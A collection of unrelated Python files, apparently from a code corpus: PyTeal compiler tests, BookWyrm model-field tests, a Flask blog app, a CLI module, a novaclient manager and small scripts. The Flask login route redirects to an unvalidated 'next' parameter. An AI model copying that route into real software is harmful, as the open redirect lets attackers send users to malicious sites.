TealOp(None, Op.callsub, subroutine),
TealOp(None, Op.return_),
]
subroutineMapping = {
None: mainOps,
subroutine: subroutineOps,
}
subroutineGraph = {
subroutine: {subroutine},
}
localSlots = {None: set(), subroutine: {0, 1, 2}}
spillLocalSlotsDuringRecursion(5, subroutineMapping, subroutineGraph, localSlots)
assert subroutineMapping == {
None: [
TealOp(None, Op.int, 1),
TealOp(None, Op.int, 2),
TealOp(None, Op.int, 3),
TealOp(None, Op.callsub, subroutine),
TealOp(None, Op.return_),
],
subroutine: [
TealOp(None, Op.store, 0),
TealOp(None, Op.store, 1),
TealOp(None, Op.store, 2),
TealOp(None, Op.int, 1),
TealOp(None, Op.int, 2),
TealOp(None, Op.int, 3),
TealOp(None, Op.load, 0),
TealOp(None, Op.load, 1),
TealOp(None, Op.load, 2),
TealOp(None, Op.uncover, 5),
TealOp(None, Op.uncover, 5),
TealOp(None, Op.uncover, 5),
TealOp(None, Op.callsub, subroutine),
TealOp(None, Op.cover, 3),
TealOp(None, Op.store, 2),
TealOp(None, Op.store, 1),
TealOp(None, Op.store, 0),
TealOp(None, Op.retsub),
],
}
def test_spillLocalSlotsDuringRecursion_recursive_more_args_than_slots_v5():
def subImpl(a1, a2, a3):
return None
subroutine = SubroutineDefinition(subImpl, TealType.uint64)
subroutineOps = [
TealOp(None, Op.store, 0),
TealOp(None, Op.store, 1),
TealOp(None, Op.pop),
TealOp(None, Op.int, 1),
TealOp(None, Op.int, 2),
TealOp(None, Op.int, 3),
TealOp(None, Op.callsub, subroutine),
TealOp(None, Op.retsub),
]
mainOps = [
TealOp(None, Op.int, 1),
TealOp(None, Op.int, 2),
TealOp(None, Op.int, 3),
TealOp(None, Op.callsub, subroutine),
TealOp(None, Op.return_),
]
subroutineMapping = {
None: mainOps,
subroutine: subroutineOps,
}
subroutineGraph = {
subroutine: {subroutine},
}
localSlots = {None: set(), subroutine: {0, 1}}
spillLocalSlotsDuringRecursion(5, subroutineMapping, subroutineGraph, localSlots)
assert subroutineMapping == {
None: [
TealOp(None, Op.int, 1),
TealOp(None, Op.int, 2),
TealOp(None, Op.int, 3),
TealOp(None, Op.callsub, subroutine),
TealOp(None, Op.return_),
],
subroutine: [
TealOp(None, Op.store, 0),
TealOp(None, Op.store, 1),
TealOp(None, Op.pop),
TealOp(None, Op.int, 1),
TealOp(None, Op.int, 2),
TealOp(None, Op.int, 3),
TealOp(None, Op.load, 0),
TealOp(None, Op.cover, 3),
TealOp(None, Op.load, 1),
TealOp(None, Op.cover, 3),
TealOp(None, Op.callsub, subroutine),
TealOp(None, Op.cover, 2),
TealOp(None, Op.store, 1),
TealOp(None, Op.store, 0),
TealOp(None, Op.retsub),
],
}
def test_spillLocalSlotsDuringRecursion_recursive_more_slots_than_args_v5():
def subImpl(a1, a2, a3):
return None
subroutine = SubroutineDefinition(subImpl, TealType.uint64)
subroutineOps = [
TealOp(None, Op.store, 0),
TealOp(None, Op.store, 1),
TealOp(None, Op.store, 2),
TealOp(None, Op.int, 10),
TealOp(None, Op.store, 3),
TealOp(None, Op.int, 1),
TealOp(None, Op.int, 2),
TealOp(None, Op.int, 3),
TealOp(None, Op.callsub, subroutine),
TealOp(None, Op.retsub),
]
mainOps = [
TealOp(None, Op.int, 1),
TealOp(None, Op.int, 2),
TealOp(None, Op.int, 3),
TealOp(None, Op.callsub, subroutine),
TealOp(None, Op.return_),
]
subroutineMapping = {
None: mainOps,
subroutine: subroutineOps,
}
subroutineGraph = {
subroutine: {subroutine},
}
localSlots = {None: set(), subroutine: {0, 1, 2, 3}}
spillLocalSlotsDuringRecursion(5, subroutineMapping, subroutineGraph, localSlots)
assert subroutineMapping == {
None: [
TealOp(None, Op.int, 1),
TealOp(None, Op.int, 2),
TealOp(None, Op.int, 3),
TealOp(None, Op.callsub, subroutine),
TealOp(None, Op.return_),
],
subroutine: [
TealOp(None, Op.store, 0),
TealOp(None, Op.store, 1),
TealOp(None, Op.store, 2),
TealOp(None, Op.int, 10),
TealOp(None, Op.store, 3),
TealOp(None, Op.int, 1),
TealOp(None, Op.int, 2),
TealOp(None, Op.int, 3),
TealOp(None, Op.load, 0),
TealOp(None, Op.load, 1),
TealOp(None, Op.load, 2),
TealOp(None, Op.load, 3),
TealOp(None, Op.uncover, 6),
TealOp(None, Op.uncover, 6),
TealOp(None, Op.uncover, 6),
TealOp(None, Op.callsub, subroutine),
TealOp(None, Op.cover, 4),
TealOp(None, Op.store, 3),
TealOp(None, Op.store, 2),
TealOp(None, Op.store, 1),
TealOp(None, Op.store, 0),
TealOp(None, Op.retsub),
],
}
def test_spillLocalSlotsDuringRecursion_recursive_with_scratchvar():
# modifying test_spillLocalSlotsDuringRecursion_multiple_subroutines_no_recursion()
# to be recursive and fail due to by-ref args
def sub1Impl(a1):
return None
def sub2Impl(a1, a2: ScratchVar):
return None
def sub3Impl(a1, a2, a3):
return None
subroutine1 = SubroutineDefinition(sub1Impl, TealType.uint64)
subroutine2 = SubroutineDefinition(sub2Impl, TealType.uint64)
subroutine3 = SubroutineDefinition(sub3Impl, TealType.none)
subroutine1L1Label = LabelReference("l1")
subroutine1Ops = [
TealOp(None, Op.store, 0),
TealOp(None, Op.load, 0),
TealOp(None, Op.int, 0),
TealOp(None, Op.eq),
TealOp(None, Op.bnz, subroutine1L1Label),
TealOp(None, Op.err),
TealLabel(None, subroutine1L1Label),
TealOp(None, Op.int, 1),
TealOp(None, Op.callsub, subroutine3),
TealOp(None, Op.retsub),
]
subroutine2L1Label = LabelReference("l1")
subroutine2Ops = [
TealOp(None, Op.store, 1),
TealOp(None, Op.load, 1),
TealOp(None, Op.int, 0),
TealOp(None, Op.eq),
TealOp(None, Op.bnz, subroutine2L1Label),
TealOp(None, Op.err),
TealLabel(None, subroutine2L1Label),
TealOp(None, Op.int, 1),
TealOp(None, Op.retsub),
]
subroutine3Ops = [
TealOp(None, Op.retsub),
]
l1Label = LabelReference("l1")
mainOps = [
TealOp(None, Op.txn, "Fee"),
TealOp(None, Op.int, 0),
TealOp(None, Op.eq),
TealOp(None, Op.bz, l1Label),
TealOp(None, Op.int, 100),
TealOp(None, Op.callsub, subroutine1),
TealOp(None, Op.return_),
TealLabel(None, l1Label),
TealOp(None, Op.int, 101),
TealOp(None, Op.callsub, subroutine2),
TealOp(None, Op.return_),
]
subroutineMapping = {
None: mainOps,
subroutine1: subroutine1Ops,
subroutine2: subroutine2Ops,
subroutine3: subroutine3Ops,
}
subroutineGraph = {
subroutine1: {subroutine2},
subroutine2: {subroutine1},
subroutine3: set(),
}
localSlots = {None: set(), subroutine1: {0}, subroutine2: {1}, subroutine3: {}}
with pytest.raises(TealInputError) as tie:
spillLocalSlotsDuringRecursion(
5, subroutineMapping, subroutineGraph, localSlots
)
assert (
"ScratchVar arguments not allowed in recursive subroutines, but a recursive call-path was detected: sub2Impl()-->sub1Impl()-->sub2Impl()"
in str(tie)
)
def test_resolveSubroutines():
def sub1Impl(a1):
return None
def sub2Impl(a1, a2):
return None
def sub3Impl(a1, a2, a3):
return None
subroutine1 = SubroutineDefinition(sub1Impl, TealType.uint64)
subroutine2 = SubroutineDefinition(sub2Impl, TealType.uint64)
subroutine3 = SubroutineDefinition(sub3Impl, TealType.none)
subroutine1L1Label = LabelReference("l1")
subroutine1Ops = [
TealOp(None, Op.store, 0),
TealOp(None, Op.load, 0),
TealOp(None, Op.int, 0),
TealOp(None, Op.eq),
TealOp(None, Op.bnz, subroutine1L1Label),
TealOp(None, Op.load, 0),
TealOp(None, Op.int, 1),
TealOp(None, Op.minus),
TealOp(None, Op.load, 0),
TealOp(None, Op.dig, 1),
TealOp(None, Op.callsub, subroutine1),
TealOp(None, Op.swap),
TealOp(None, Op.store, 0),
TealOp(None, Op.swap),
TealOp(None, Op.pop),
TealOp(None, Op.int, 1),
TealOp(None, Op.add),
TealOp(None, Op.retsub),
TealLabel(None, subroutine1L1Label),
TealOp(None, Op.load, 255),
TealOp(None, Op.retsub),
]
subroutine2L1Label = LabelReference("l1")
subroutine2Ops = [
TealOp(None, Op.store, 1),
TealOp(None, Op.load, 1),
TealOp(None, Op.int, 0),
TealOp(None, Op.eq),
TealOp(None, Op.bnz, subroutine2L1Label),
TealOp(None, Op.load, 0),
TealOp(None, Op.int, 1),
TealOp(None, Op.minus),
TealOp(None, Op.callsub, subroutine1),
TealOp(None, Op.int, 1),
TealOp(None, Op.add),
TealOp(None, Op.retsub),
TealLabel(None, subroutine2L1Label),
TealOp(None, Op.int, 1),
TealOp(None, Op.retsub),
]
subroutine3Ops = [
TealOp(None, Op.callsub, subroutine3),
TealOp(None, Op.retsub),
]
l1Label = LabelReference("l1")
mainOps = [
TealOp(None, Op.int, 1),
TealOp(None, Op.store, 255),
TealOp(None, Op.txn, "Fee"),
TealOp(None, Op.int, 0),
TealOp(None, Op.eq),
TealOp(None, Op.bz, l1Label),
TealOp(None, Op.int, 100),
TealOp(None, Op.callsub, subroutine1),
TealOp(None, Op.return_),
TealLabel(None, l1Label),
TealOp(None, Op.int, 101),
TealOp(None, Op.callsub, subroutine2),
TealOp(None, Op.return_),
TealOp(None, Op.callsub, subroutine3),
]
subroutineMapping = {
None: mainOps,
subroutine1: subroutine1Ops,
subroutine2: subroutine2Ops,
subroutine3: subroutine3Ops,
}
expected = OrderedDict()
expected[subroutine1] = "sub1Impl_0"
expected[subroutine2] = "sub2Impl_1"
expected[subroutine3] = "sub3Impl_2"
actual = resolveSubroutines(subroutineMapping)
assert actual == expected
assert mainOps == [
TealOp(None, Op.int, 1),
TealOp(None, Op.store, 255),
TealOp(None, Op.txn, "Fee"),
TealOp(None, Op.int, 0),
TealOp(None, Op.eq),
TealOp(None, Op.bz, l1Label),
TealOp(None, Op.int, 100),
TealOp(None, Op.callsub, expected[subroutine1]),
TealOp(None, Op.return_),
TealLabel(None, l1Label),
TealOp(None, Op.int, 101),
TealOp(None, Op.callsub, expected[subroutine2]),
TealOp(None, Op.return_),
TealOp(None, Op.callsub, expected[subroutine3]),
]
assert subroutine1Ops == [
TealOp(None, Op.store, 0),
TealOp(None, Op.load, 0),
TealOp(None, Op.int, 0),
TealOp(None, Op.eq),
TealOp(None, Op.bnz, subroutine1L1Label),
TealOp(None, Op.load, 0),
TealOp(None, Op.int, 1),
TealOp(None, Op.minus),
TealOp(None, Op.load, 0),
TealOp(None, Op.dig, 1),
TealOp(None, Op.callsub, expected[subroutine1]),
TealOp(None, Op.swap),
TealOp(None, Op.store, 0),
TealOp(None, Op.swap),
TealOp(None, Op.pop),
TealOp(None, Op.int, 1),
TealOp(None, Op.add),
TealOp(None, Op.retsub),
TealLabel(None, subroutine1L1Label),
TealOp(None, Op.load, 255),
TealOp(None, Op.retsub),
]
assert subroutine2Ops == [
TealOp(None, Op.store, 1),
TealOp(None, Op.load, 1),
TealOp(None, Op.int, 0),
TealOp(None, Op.eq),
TealOp(None, Op.bnz, subroutine2L1Label),
TealOp(None, Op.load, 0),
TealOp(None, Op.int, 1),
TealOp(None, Op.minus),
TealOp(None, Op.callsub, expected[subroutine1]),
TealOp(None, Op.int, 1),
TealOp(None, Op.add),
TealOp(None, Op.retsub),
TealLabel(None, subroutine2L1Label),
TealOp(None, Op.int, 1),
TealOp(None, Op.retsub),
]
assert subroutine3Ops == [
TealOp(None, Op.callsub, expected[subroutine3]),
TealOp(None, Op.retsub),
]
| python |
#!/bin/python
def opDeterminer(ops):
vals = []
for op in ops:
if op[0] == 'r':
(vals, success) = removeOp(vals, long(op[1]))
if not success:
print ('Wrong!')
continue
elif op[0] == 'a':
(vals, success) = addOp(vals, long(op[1]))
median(vals)
def removeOp(vals, toRemove):
if toRemove in vals:
vals.remove(toRemove)
return (vals, True)
else:
return (vals, False)
def addOp(vals, toAdd):
newVals = []
success = False
for val in vals:
if val <= toAdd or success:
newVals.append(val)
else:
newVals.append(toAdd)
newVals.append(val)
success = True
if not success:
newVals.append(toAdd)
return (newVals, success)
def median(vals):
size = len(vals)
if size:
median = 0.5 * (vals[size/2] + vals[(size-1)/2])
else:
median = None
if not median:
print ('Wrong!')
elif median.is_integer():
print (int(median))
else:
print (median)
numOps = int(input())
ops = []
for i in range(numOps):
op = raw_input().strip().split(' ')
ops.append(op)
opDeterminer(ops) | python |
import signal, time
STATE = 0
def state2(signum, frame):
print('state2')
signal.signal(signal.SIGHUP, signal.SIG_DFL)
def state1(signum, frame):
print('state1')
signal.signal(signal.SIGHUP, state2)
signal.signal(signal.SIGHUP, state1)
while STATE < 10:
time.sleep(0.01)
| python |
''' testing models '''
from io import BytesIO
from collections import namedtuple
import json
import pathlib
import re
from unittest.mock import patch
from PIL import Image
import responses
from django.core.exceptions import ValidationError
from django.core.files.base import ContentFile
from django.db import models
from django.test import TestCase
from django.utils import timezone
from bookwyrm.models import fields, User
class ActivitypubFields(TestCase):
''' overwrites standard model feilds to work with activitypub '''
def test_validate_remote_id(self):
''' should look like a url '''
self.assertIsNone(fields.validate_remote_id(
'http://www.example.com'
))
self.assertIsNone(fields.validate_remote_id(
'https://www.example.com'
))
self.assertIsNone(fields.validate_remote_id(
'http://example.com/dlfjg-23/x'
))
self.assertRaises(
ValidationError, fields.validate_remote_id,
'http:/example.com/dlfjg-23/x'
)
self.assertRaises(
ValidationError, fields.validate_remote_id,
'www.example.com/dlfjg-23/x'
)
self.assertRaises(
ValidationError, fields.validate_remote_id,
'http://www.example.com/dlfjg 23/x'
)
def test_activitypub_field_mixin(self):
''' generic mixin with super basic to and from functionality '''
instance = fields.ActivitypubFieldMixin()
self.assertEqual(instance.field_to_activity('fish'), 'fish')
self.assertEqual(instance.field_from_activity('fish'), 'fish')
self.assertFalse(instance.deduplication_field)
instance = fields.ActivitypubFieldMixin(
activitypub_wrapper='endpoints', activitypub_field='outbox'
)
self.assertEqual(
instance.field_to_activity('fish'),
{'outbox': 'fish'}
)
self.assertEqual(
instance.field_from_activity({'outbox': 'fish'}),
'fish'
)
self.assertEqual(instance.get_activitypub_field(), 'endpoints')
instance = fields.ActivitypubFieldMixin()
instance.name = 'snake_case_name'
self.assertEqual(instance.get_activitypub_field(), 'snakeCaseName')
def test_remote_id_field(self):
''' just sets some defaults on charfield '''
instance = fields.RemoteIdField()
self.assertEqual(instance.max_length, 255)
self.assertTrue(instance.deduplication_field)
with self.assertRaises(ValidationError):
instance.run_validators('http://www.example.com/dlfjg 23/x')
def test_username_field(self):
''' again, just setting defaults on username field '''
instance = fields.UsernameField()
self.assertEqual(instance.activitypub_field, 'preferredUsername')
self.assertEqual(instance.max_length, 150)
self.assertEqual(instance.unique, True)
with self.assertRaises(ValidationError):
instance.run_validators('one two')
instance.run_validators('a*&')
instance.run_validators('trailingwhite ')
self.assertIsNone(instance.run_validators('aksdhf'))
self.assertEqual(instance.field_to_activity('[email protected]'), 'test')
def test_foreign_key(self):
''' should be able to format a related model '''
instance = fields.ForeignKey('User', on_delete=models.CASCADE)
Serializable = namedtuple('Serializable', ('to_activity', 'remote_id'))
item = Serializable(lambda: {'a': 'b'}, 'https://e.b/c')
# returns the remote_id field of the related object
self.assertEqual(instance.field_to_activity(item), 'https://e.b/c')
@responses.activate
def test_foreign_key_from_activity_str(self):
''' create a new object from a foreign key '''
instance = fields.ForeignKey(User, on_delete=models.CASCADE)
datafile = pathlib.Path(__file__).parent.joinpath(
'../data/ap_user.json')
userdata = json.loads(datafile.read_bytes())
# don't try to load the user icon
del userdata['icon']
# it shouldn't match with this unrelated user:
unrelated_user = User.objects.create_user(
'rat', '[email protected]', 'ratword', local=True)
# test receiving an unknown remote id and loading data
responses.add(
responses.GET,
'https://example.com/user/mouse',
json=userdata,
status=200)
with patch('bookwyrm.models.user.set_remote_server.delay'):
value = instance.field_from_activity(
'https://example.com/user/mouse')
self.assertIsInstance(value, User)
self.assertNotEqual(value, unrelated_user)
self.assertEqual(value.remote_id, 'https://example.com/user/mouse')
self.assertEqual(value.name, 'MOUSE?? MOUSE!!')
def test_foreign_key_from_activity_dict(self):
''' test recieving activity json '''
instance = fields.ForeignKey(User, on_delete=models.CASCADE)
datafile = pathlib.Path(__file__).parent.joinpath(
'../data/ap_user.json')
userdata = json.loads(datafile.read_bytes())
# don't try to load the user icon
del userdata['icon']
# it shouldn't match with this unrelated user:
unrelated_user = User.objects.create_user(
'rat', '[email protected]', 'ratword', local=True)
with patch('bookwyrm.models.user.set_remote_server.delay'):
value = instance.field_from_activity(userdata)
self.assertIsInstance(value, User)
self.assertNotEqual(value, unrelated_user)
self.assertEqual(value.remote_id, 'https://example.com/user/mouse')
self.assertEqual(value.name, 'MOUSE?? MOUSE!!')
# et cetera but we're not testing serializing user json
def test_foreign_key_from_activity_dict_existing(self):
''' test receiving a dict of an existing object in the db '''
instance = fields.ForeignKey(User, on_delete=models.CASCADE)
datafile = pathlib.Path(__file__).parent.joinpath(
'../data/ap_user.json'
)
userdata = json.loads(datafile.read_bytes())
user = User.objects.create_user(
'mouse', '[email protected]', 'mouseword', local=True)
user.remote_id = 'https://example.com/user/mouse'
user.save()
User.objects.create_user(
'rat', '[email protected]', 'ratword', local=True)
value = instance.field_from_activity(userdata)
self.assertEqual(value, user)
def test_foreign_key_from_activity_str_existing(self):
''' test receiving a remote id of an existing object in the db '''
instance = fields.ForeignKey(User, on_delete=models.CASCADE)
user = User.objects.create_user(
'mouse', '[email protected]', 'mouseword', local=True)
User.objects.create_user(
'rat', '[email protected]', 'ratword', local=True)
value = instance.field_from_activity(user.remote_id)
self.assertEqual(value, user)
def test_one_to_one_field(self):
''' a gussied up foreign key '''
instance = fields.OneToOneField('User', on_delete=models.CASCADE)
Serializable = namedtuple('Serializable', ('to_activity', 'remote_id'))
item = Serializable(lambda: {'a': 'b'}, 'https://e.b/c')
self.assertEqual(instance.field_to_activity(item), {'a': 'b'})
def test_many_to_many_field(self):
''' lists! '''
instance = fields.ManyToManyField('User')
Serializable = namedtuple('Serializable', ('to_activity', 'remote_id'))
Queryset = namedtuple('Queryset', ('all', 'instance'))
item = Serializable(lambda: {'a': 'b'}, 'https://e.b/c')
another_item = Serializable(lambda: {}, 'example.com')
items = Queryset(lambda: [item], another_item)
self.assertEqual(instance.field_to_activity(items), ['https://e.b/c'])
instance = fields.ManyToManyField('User', link_only=True)
instance.name = 'snake_case'
self.assertEqual(
instance.field_to_activity(items),
'example.com/snake_case'
)
@responses.activate
def test_many_to_many_field_from_activity(self):
''' resolve related fields for a list, takes a list of remote ids '''
instance = fields.ManyToManyField(User)
datafile = pathlib.Path(__file__).parent.joinpath(
'../data/ap_user.json'
)
userdata = json.loads(datafile.read_bytes())
# don't try to load the user icon
del userdata['icon']
# test receiving an unknown remote id and loading data
responses.add(
responses.GET,
'https://example.com/user/mouse',
json=userdata,
status=200)
with patch('bookwyrm.models.user.set_remote_server.delay'):
value = instance.field_from_activity(
['https://example.com/user/mouse', 'bleh']
)
self.assertIsInstance(value, list)
self.assertEqual(len(value), 1)
self.assertIsInstance(value[0], User)
def test_tag_field(self):
''' a special type of many to many field '''
instance = fields.TagField('User')
Serializable = namedtuple(
'Serializable',
('to_activity', 'remote_id', 'name_field', 'name')
)
Queryset = namedtuple('Queryset', ('all', 'instance'))
item = Serializable(
lambda: {'a': 'b'}, 'https://e.b/c', 'name', 'Name')
another_item = Serializable(
lambda: {}, 'example.com', '', '')
items = Queryset(lambda: [item], another_item)
result = instance.field_to_activity(items)
self.assertIsInstance(result, list)
self.assertEqual(len(result), 1)
self.assertEqual(result[0].href, 'https://e.b/c')
self.assertEqual(result[0].name, 'Name')
self.assertEqual(result[0].type, 'Serializable')
def test_tag_field_from_activity(self):
''' loadin' a list of items from Links '''
# TODO
@responses.activate
def test_image_field(self):
''' storing images '''
user = User.objects.create_user(
'mouse', '[email protected]', 'mouseword', local=True)
image_file = pathlib.Path(__file__).parent.joinpath(
'../../static/images/default_avi.jpg')
image = Image.open(image_file)
output = BytesIO()
image.save(output, format=image.format)
user.avatar.save(
'test.jpg',
ContentFile(output.getvalue())
)
output = fields.image_serializer(user.avatar)
self.assertIsNotNone(
re.match(
r'.*\.jpg',
output.url,
)
)
self.assertEqual(output.type, 'Image')
instance = fields.ImageField()
self.assertEqual(instance.field_to_activity(user.avatar), output)
responses.add(
responses.GET,
'http://www.example.com/image.jpg',
body=user.avatar.file.read(),
status=200)
loaded_image = instance.field_from_activity(
'http://www.example.com/image.jpg')
self.assertIsInstance(loaded_image, list)
self.assertIsInstance(loaded_image[1], ContentFile)
def test_datetime_field(self):
''' this one is pretty simple, it just has to use isoformat '''
instance = fields.DateTimeField()
now = timezone.now()
self.assertEqual(instance.field_to_activity(now), now.isoformat())
self.assertEqual(
instance.field_from_activity(now.isoformat()), now
)
self.assertEqual(instance.field_from_activity('bip'), None)
def test_array_field(self):
''' idk why it makes them strings but probably for a good reason '''
instance = fields.ArrayField(fields.IntegerField)
self.assertEqual(instance.field_to_activity([0, 1]), ['0', '1'])
| python |
class _Position:
def __init__(self, shares, share_price):
if share_price <= 0:
raise ValueError("Please enter a positive number for share_price")
self.shares = shares
self.position_size = float(shares * share_price)
def buy(self, shares, share_price):
if shares < 0 or share_price <= 0:
raise ValueError(" Please enter positive numbers for shares and share_price", shares, share_price)
if self.shares >= 0:
self.shares += shares
self.position_size += shares * share_price
return float('NaN')
else: # covering short position
if abs(self.shares) >= shares:
profit = (self.position_size / self.shares) * shares - share_price * shares
self.position_size += share_price * shares + profit
self.shares += shares
return profit
else:
profit = self.position_size - share_price * self.shares
self.shares += shares
self.position_size += shares * share_price + profit
return profit
def sell(self, shares, share_price):
if shares < 0 or share_price <= 0:
raise ValueError(" Please enter positive numbers for shares and share_price")
if self.shares <= 0:
self.shares -= shares
self.position_size -= shares * share_price
return float('NaN')
else: # covering long position
if self.shares >= shares:
profit = share_price * shares - (self.position_size / self.shares) * shares
self.shares -= shares
self.position_size -= shares * share_price - profit
return profit
else:
profit = share_price * self.shares - self.position_size
self.shares -= shares
self.position_size -= shares * share_price - profit
return profit
def get_shares(self):
return self.shares
def to_tuple(self):
return self.shares, self.position_size
def to_dict(self):
return {'shares': self.shares, 'position_size': self.position_size} | python |
import io
import re
from pathlib import Path
from zipfile import ZipFile
import typer
from typer import Option, Argument
from patterns.cli.services.lookup import IdLookup
from patterns.cli.services.output import sprint, abort_on_error, abort
from patterns.cli.services.pull import (
download_graph_zip,
download_component_zip,
COMPONENT_RE,
)
from patterns.configuration.edit import GraphDirectoryEditor, FileOverwriteError
_graph_help = "The name of a graph in your Patterns organization [default: directory name]"
_graph_version_id_help = (
"The id of the graph version to pull. [default: latest version]"
)
_organization_help = "The name of the Patterns organization that the graph was uploaded to"
_force_help = "Overwrite existing files without prompting"
_directory_help = "The directory to create the new graph in. Must not exist."
_component_help = (
"The component version to download (e.g. 'organization/component@v1')."
)
def clone(
organization: str = Option("", "-o", "--organization", help=_organization_help),
graph: str = Option("", help=_graph_help),
graph_version_id: str = Option("", "-v", "--version", help=_graph_version_id_help),
component: str = Option("", "--component", help=_component_help),
directory: Path = Argument(None, exists=False, help=_graph_help),
):
"""Download the code for a graph"""
if not graph and not directory and not component:
if graph_version_id:
abort(
f"Missing graph directory argument."
f"\ntry [code]patterns clone -v {graph_version_id} new_graph"
)
else:
abort(
f"Missing graph argument." f"\ntry [code]patterns clone graph-to-clone"
)
component_match = COMPONENT_RE.fullmatch(component)
if component and not component_match:
abort(
"Invalid component version. Must be in the form organization/component@v1"
)
component_name = component_match.group(2) if component_match else None
ids = IdLookup(
organization_name=organization,
explicit_graph_name=graph or component_name or directory.name,
explicit_graph_version_id=graph_version_id,
)
if not directory:
if component:
directory = Path(component_name)
elif graph:
directory = Path(graph)
elif graph_version_id:
with abort_on_error("Error"):
directory = Path(ids.graph_name)
else:
abort("Specify --graph, --graph-version-id, or a directory")
with abort_on_error("Error cloning graph"):
if component:
content = download_component_zip(component)
else:
content = download_graph_zip(ids.graph_version_id)
editor = GraphDirectoryEditor(directory, overwrite=False)
with ZipFile(io.BytesIO(content), "r") as zf:
editor.add_node_from_zip("graph.yml", "graph.yml", zf)
sprint(f"[success]Cloned graph into {directory}")
_pull_graph_help = "The location of the graph to pull into [default: current directory]"
def pull(
organization: str = Option("", "-o", "--organization", help=_organization_help),
graph_version_id: str = Option("", help=_graph_version_id_help),
force: bool = Option(False, "-f", "--force", help=_force_help),
graph: Path = Argument(None, exists=True, help=_pull_graph_help),
):
"""Update the code for the current graph"""
ids = IdLookup(
organization_name=organization,
explicit_graph_version_id=graph_version_id,
explicit_graph_path=graph,
)
with abort_on_error("Error downloading graph"):
b = io.BytesIO(download_graph_zip(ids.graph_version_id))
editor = GraphDirectoryEditor(ids.graph_file_path, overwrite=force)
with abort_on_error("Error downloading graph"):
try:
with ZipFile(b, "r") as zf:
editor.add_node_from_zip("graph.yml", "graph.yml", zf)
except FileOverwriteError as e:
sprint(f"[error]{e}")
sprint("[info]Run this command with --force to overwrite local files")
raise typer.Exit(1)
sprint(f"[success]Pulled graph content")
| python |
# Copyright (C) 2014, Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
External event triggering for servers, not to be used by users.
"""
from novaclient import base
class Event(base.Resource):
def __repr__(self):
return "<Event: %s>" % self.name
class ServerExternalEventManager(base.Manager):
resource_class = Event
def create(self, events):
"""Create one or more server events.
:param:events: A list of dictionaries containing 'server_uuid', 'name',
'status', and 'tag' (which may be absent)
"""
body = {'events': events}
return self._create('/os-server-external-events', body, 'events',
return_raw=True)
| python |
import os
from flask import render_template, url_for, flash, redirect,request,abort
from blog import app,db,bcrypt
from blog.models import User,Post
from blog.forms import RegistrationForm, LoginForm,UpdateAccountForm,PostForm
from flask_login import login_user,current_user,logout_user,login_required
import secrets
@app.route("/")
@app.route("/home")
def home():
posts = Post.query.all()
return render_template('home.html', posts=posts)
@app.route("/about")
def about():
return render_template('about.html', title='About')
@app.route("/register", methods=['GET', 'POST'])
def register():
if current_user.is_authenticated:
return redirect(url_for('home'))
form = RegistrationForm()
if form.validate_on_submit():
hashed_password = bcrypt.generate_password_hash(form.password.data).decode('utf-8')
user = User(username=form.username.data, email = form.email.data, password = hashed_password)
db.session.add(user)
db.session.commit()
flash('Your account has been activated! You can now log in', 'success')
return redirect(url_for('login'))
return render_template('register.html', title='Register', form=form)
@app.route("/login", methods=['GET', 'POST'])
def login():
if current_user.is_authenticated:
return redirect(url_for('home'))
form = LoginForm()
if form.validate_on_submit():
user = User.query.filter_by(email=form.email.data).first()
if user and bcrypt.check_password_hash(user.password,form.password.data):
login_user(user,remember=form.remember.data)
next_page = request.args.get('next')
return redirect(next_page) if next_page else redirect(url_for('home'))
else:
flash('Login Unsuccessful. Please check username and password', 'danger')
return render_template('login.html', title='Login', form=form)
@app.route("/logout")
def logout():
logout_user()
return redirect(url_for('home'))
def save_picture(form_picture):
random_hex = secrets.token_hex(8)
_,f_ext = os.path.splitext(form_picture.filename)
picture_fn = random_hex + f_ext
picture_path = os.path.join(app.root_path,'static/photos',picture_fn)
form_picture.save(picture_path)
return picture_fn
@app.route("/account",methods=['GET', 'POST'])
@login_required
def account():
form = UpdateAccountForm()
if form.validate_on_submit():
if form.picture.data:
picture_file = save_picture(form.picture.data)
current_user.image_file= picture_file
current_user.username=form.username.data
current_user.email=form.email.data
db.session.commit()
flash('Account updated','success')
return redirect(url_for('account'))
elif request.method == 'GET':
form.username.data = current_user.username
form.email.data = current_user.email
image_file = url_for('static',filename='photos/'+ current_user.image_file)
return render_template('account.html', title='Account', image_file=image_file,form=form)
@app.route("/post/new",methods=['GET', 'POST'])
@login_required
def new_post():
form = PostForm()
if form.validate_on_submit():
post = Post(title=form.title.data, content=form.content.data, author=current_user)
db.session.add(post)
db.session.commit()
flash('Post Created','Success')
return redirect(url_for('home'))
return render_template('create_post.html', title='New Post', form=form ,legend= 'Update Post')
@app.route("/post/<post_id>")
def post(post_id):
post = Post.query.get_or_404(post_id)
return render_template('post.html',title=Post.title,post=post)
@app.route("/post/<int:post_id>/update",methods=['GET', 'POST'])
@login_required
def update_post(post_id):
post = Post.query.get_or_404(post_id)
if post.author != current_user:
abort(403)
form = PostForm()
if form.validate_on_submit():
post.title = form.title.data
post.content = form.content.data
db.session.commit()
flash('Your post updated','success')
return redirect(url_for('post',post_id=post.id))
elif request.method == 'GET':
form.title.data = post.title
form.content.data = post.content
return render_template('create_post.html',title='Update Post',form=form,legend= 'Update Post')
@app.route("/post/<int:post_id>/delete",methods=['POST'])
@login_required
def delete_post(post_id):
post = Post.query.get_or_404(post_id)
if post.author != current_user:
abort(403)
db.session.delete(post)
db.session.commit()
flash('Your post is deleted','Success')
return redirect(url_for('home')) | python |
import pandas as pd
import logging
def ris_detect(raw):
""" Detect RIS format style. """
if raw.startswith('TY -'):
logging.debug('RIS file format detected.')
return 'ris'
elif raw.startswith('%0'):
logging.debug('Endnote file format detected.')
return 'endnote'
else:
logging.debug('RIS format not identified.')
raise Exception(f'Data scheme not recognised. Please check file format.\nBeginning of file: "{raw[:20]}"')
def ris_parse(ris_file):
""" Read RIS file an parse rows and values to list of lists. """
with open(ris_file, 'r', encoding='utf-8-sig') as f:
raw = f.read()
data_scheme = ris_detect(raw)
data = raw.strip()
entry_sep = '\n\n' # Use 'ER - ' or '\n\n' as entry separator.
line_sep = '\n'
# Split data and remove empty rows (Endnote format)
documents = [item for item in data.split(entry_sep) if item]
table = [[item for item in doc.split(line_sep)] for doc in documents]
return table, data_scheme
def ris_df(ris_file):
